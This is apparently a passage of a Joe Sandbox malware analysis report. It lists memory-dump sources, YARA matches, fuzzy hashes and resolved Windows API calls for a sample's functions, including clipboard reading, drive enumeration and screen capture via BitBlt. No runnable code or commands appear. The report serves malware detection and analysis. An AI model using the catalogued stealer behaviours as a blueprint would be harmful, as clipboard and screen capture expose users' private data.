                                                                                                        • Instruction Fuzzy Hash: 9CF08274A91011EFD7198B189840A3EF377FB46325F699134E515232E0D330BC12CA48
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.1946115362.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_1_2_20f0000_67E6.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 41d706f10eab7f6aa9807f481bba08dd8ed5b6f7244fe64e6bd3362bb5ad2f88
                                                                                                        • Instruction ID: f00b11492962adb7cad4d051cb1a21f164683e7689ab6562949dfbb5703e37ce
                                                                                                        • Opcode Fuzzy Hash: 41d706f10eab7f6aa9807f481bba08dd8ed5b6f7244fe64e6bd3362bb5ad2f88
                                                                                                        • Instruction Fuzzy Hash: 4FE07D386987C08BC298EB15DC708F97363AF81308714D42D825707E51EE74A866EF0E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.1945700743.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000001.00000002.1945700743.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_1_2_400000_67E6.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 41d706f10eab7f6aa9807f481bba08dd8ed5b6f7244fe64e6bd3362bb5ad2f88
                                                                                                        • Instruction ID: 7afc85315bce952cb7d9511845f2cfe5cc4fdaba4f93361a027a170bce18a72b
                                                                                                        • Opcode Fuzzy Hash: 41d706f10eab7f6aa9807f481bba08dd8ed5b6f7244fe64e6bd3362bb5ad2f88
                                                                                                        • Instruction Fuzzy Hash: B2E07D3461DA008BE218EF12D95543B73B2AF82308711587E91D3276D2CE78A806DB5D
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.1945700743.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000001.00000002.1945700743.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_1_2_400000_67E6.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: bf2067ab6f32b58c45c9008d31a8987c58cfc8b8a777689b5c00e406fa9fe567
                                                                                                        • Instruction ID: 85f90f05b7cd9740f0dd11be4e47d539d37879f59d8f753959adedc7e492877d
                                                                                                        • Opcode Fuzzy Hash: bf2067ab6f32b58c45c9008d31a8987c58cfc8b8a777689b5c00e406fa9fe567
                                                                                                        • Instruction Fuzzy Hash: 72E08678B18231DBD6148F05F99163AB3A1EFD7305F98543F904657620E334AC02C68F
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.1946115362.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_1_2_20f0000_67E6.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
                                                                                                        • Instruction ID: 0e573710d23e56bc5e750c8061059965056309d43c9092ecb20574a603e96bee
                                                                                                        • Opcode Fuzzy Hash: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
                                                                                                        • Instruction Fuzzy Hash: 27D097305883A00E47788D3810E083FFBE4E947012B08108EE0C1E3044D320EC028258
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.1945700743.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000001.00000002.1945700743.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_1_2_400000_67E6.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
                                                                                                        • Instruction ID: 3e00189c545ef2cffbc0a4c45a62ec63a19577d5de140b8962752aa3758dc2ad
                                                                                                        • Opcode Fuzzy Hash: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
                                                                                                        • Instruction Fuzzy Hash: EDD0A7755487A10E9759CD3804A04B7FBE8E947612B1814EFE4D5E7205D239DC46469C
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.1946115362.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_1_2_20f0000_67E6.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: c0d29d2c066fb543f05896e7434625b03865aceeb40a931a3d9b644db311bfe7
                                                                                                        • Instruction ID: 768837cf090ee385d5731d8a656f4dec4aa8fce5ddc261d726b0ecd34cb7bdc7
                                                                                                        • Opcode Fuzzy Hash: c0d29d2c066fb543f05896e7434625b03865aceeb40a931a3d9b644db311bfe7
                                                                                                        • Instruction Fuzzy Hash: 2BC04C69A6C5008A9288CB15AC5053562769B8B254715E029801A53655E2249457C90D
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.1945700743.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000001.00000002.1945700743.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_1_2_400000_67E6.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: c0d29d2c066fb543f05896e7434625b03865aceeb40a931a3d9b644db311bfe7
                                                                                                        • Instruction ID: 8c6602917fdb956e33e5ed0c062c44bb8739f147fa9184780212f41d8b26cb24
                                                                                                        • Opcode Fuzzy Hash: c0d29d2c066fb543f05896e7434625b03865aceeb40a931a3d9b644db311bfe7
                                                                                                        • Instruction Fuzzy Hash: 50C04C69E6C4008B924CCB15AC5153266769B8B254715E03A841663255E234945B950D
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.1946115362.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_1_2_20f0000_67E6.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 35d2e33cd3e1e12ea04a62caa481261f2aa62d3dab37d938482d2be42403fd6b
                                                                                                        • Instruction ID: d46756a0e1fb04911aea311e00f3b6d6bbb29cfd6f8012ad29779e734c60ec08
                                                                                                        • Opcode Fuzzy Hash: 35d2e33cd3e1e12ea04a62caa481261f2aa62d3dab37d938482d2be42403fd6b
                                                                                                        • Instruction Fuzzy Hash: D7B002749493418BD380CF18D545726F6F0B747615F142919A054F3151D374D9488A5E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.1946115362.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_1_2_20f0000_67E6.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 3b31a4ec24c9909080489b0d4d2d3b4d03d345a3c8726ed2263eab24f62679d5
                                                                                                        • Instruction ID: c018d795f0dc3322a67de82126959776e6cc80093cc23c5047751edba26d1c35
                                                                                                        • Opcode Fuzzy Hash: 3b31a4ec24c9909080489b0d4d2d3b4d03d345a3c8726ed2263eab24f62679d5
                                                                                                        • Instruction Fuzzy Hash: BC900224D49100CA81408F45A480570E278630B10DF1534109008F3011C210D404450C
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.1946115362.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_1_2_20f0000_67E6.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
                                                                                                        • String ID: @$B$C$E$F$K$N$O$t${$}
                                                                                                        • API String ID: 2832541153-984153585
                                                                                                        • Opcode ID: 8fd00541a03fdab39137d35ec259fb7aeeef9dd7c60101cc427a738eb574f5a5
                                                                                                        • Instruction ID: c33109369e6f3e5687f249e8cc7627892f51fa30fab0e06beb13a0acbeea8c82
                                                                                                        • Opcode Fuzzy Hash: 8fd00541a03fdab39137d35ec259fb7aeeef9dd7c60101cc427a738eb574f5a5
                                                                                                        • Instruction Fuzzy Hash: 38416A7050C3918EE310EF78948835FBFE1AB96318F05496DE5D986292D3B9858CCBA7
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.1945700743.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000001.00000002.1945700743.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_1_2_400000_67E6.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
                                                                                                        • String ID: @$B$C$E$F$K$N$O$t${$}
                                                                                                        • API String ID: 2832541153-984153585
                                                                                                        • Opcode ID: bcc03291c71dc1ac25c6e95f0924d253445351a4da78695e986e918d99809bc9
                                                                                                        • Instruction ID: d12379fae56aa42f0d26b1a9ba346e1c7749dd96ee15ae9ce42ccc61be201c2c
                                                                                                        • Opcode Fuzzy Hash: bcc03291c71dc1ac25c6e95f0924d253445351a4da78695e986e918d99809bc9
                                                                                                        • Instruction Fuzzy Hash: 65418FB050C3818ED301EF78D58931FBFE0AF96318F05492EE4C996292D67D8549CBAB
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.1946115362.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_1_2_20f0000_67E6.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: DrivesLogical
                                                                                                        • String ID: %\)R$,X*^$.T'j$1D6Z$:@&F$?P:V$C`<f
                                                                                                        • API String ID: 999431828-351939610
                                                                                                        • Opcode ID: 4f62df2b81f42cfb46ec157f180c00cd4febe93a651d1f2f065370f133753792
                                                                                                        • Instruction ID: 88b0f371d65b8c4870b27159c5d0309314223cfa78d9ff008984233156dbc873
                                                                                                        • Opcode Fuzzy Hash: 4f62df2b81f42cfb46ec157f180c00cd4febe93a651d1f2f065370f133753792
                                                                                                        • Instruction Fuzzy Hash: C831EBB41493549FC710CF29C86126BBBF2FFC2354F44982CE6964B720E7799946CB86
                                                                                                        APIs
                                                                                                        • GetDC.USER32(00000000), ref: 02126BF0
                                                                                                        • GetCurrentObject.GDI32(00000000,00000007), ref: 02126C11
                                                                                                        • GetObjectW.GDI32(00000000,00000018,?), ref: 02126C21
                                                                                                        • DeleteObject.GDI32(00000000), ref: 02126C28
                                                                                                        • CreateCompatibleDC.GDI32(00000000), ref: 02126C37
                                                                                                        • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 02126C42
                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 02126C4E
                                                                                                        • BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,00CC0020), ref: 02126C71
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.1946115362.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_1_2_20f0000_67E6.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Object$CompatibleCreate$BitmapCurrentDeleteSelect
                                                                                                        • String ID:
                                                                                                        • API String ID: 2843486406-0
                                                                                                        • Opcode ID: 637d2dcd770b1b81d6daddeec98349090a5cabd35a80d80db673790c1e385553
                                                                                                        • Instruction ID: 758a4e5e4de233cf02a544188721c27233a2329c880a9f3ac2aff08e15590b96
                                                                                                        • Opcode Fuzzy Hash: 637d2dcd770b1b81d6daddeec98349090a5cabd35a80d80db673790c1e385553
                                                                                                        • Instruction Fuzzy Hash: 3F214FB9544310EFE3509F609C49B2B7BF8EB8AB11F014929FA59A2290D77498048B67
                                                                                                        APIs
                                                                                                        • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000), ref: 02115411
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.1946115362.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_1_2_20f0000_67E6.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: EnvironmentExpandStrings
                                                                                                        • String ID: +$e$+$e$XY$E#G
                                                                                                        • API String ID: 237503144-1023387988
                                                                                                        • Opcode ID: 796cc6ccac140472a8104463ef7e640a249bdffaa71f860e68154a69d4d8fa0c
                                                                                                        • Instruction ID: 834c2999c05d606125c6d3d238ce7c0221c3ebe524f1e6ee6ea3af69560dbaf0
                                                                                                        • Opcode Fuzzy Hash: 796cc6ccac140472a8104463ef7e640a249bdffaa71f860e68154a69d4d8fa0c
                                                                                                        • Instruction Fuzzy Hash: 2221F43424C344AFE3148F65E88175FBBE1EBC6714F25C92DE5A85B282D775C80A8B86
                                                                                                        APIs
                                                                                                        • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 02115B5B
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.1946115362.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_1_2_20f0000_67E6.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: EnvironmentExpandStrings
                                                                                                        • String ID: B"@$`J/H$rp
                                                                                                        • API String ID: 237503144-3817236508
                                                                                                        • Opcode ID: d1879db7092e8caf361d2fa4e2e19fcb9f3d80e285b1dd23349b8ef0ea2aa233
                                                                                                        • Instruction ID: 2538dc706f001554c68ec589d75d074b9cebcfbe743ecff17800da7c5cc231b1
                                                                                                        • Opcode Fuzzy Hash: d1879db7092e8caf361d2fa4e2e19fcb9f3d80e285b1dd23349b8ef0ea2aa233
                                                                                                        • Instruction Fuzzy Hash: 1E31CDB0E443489FDB10CFA9D8827DEBBB2EF45700F50002CE441BB295D6B55906CFAA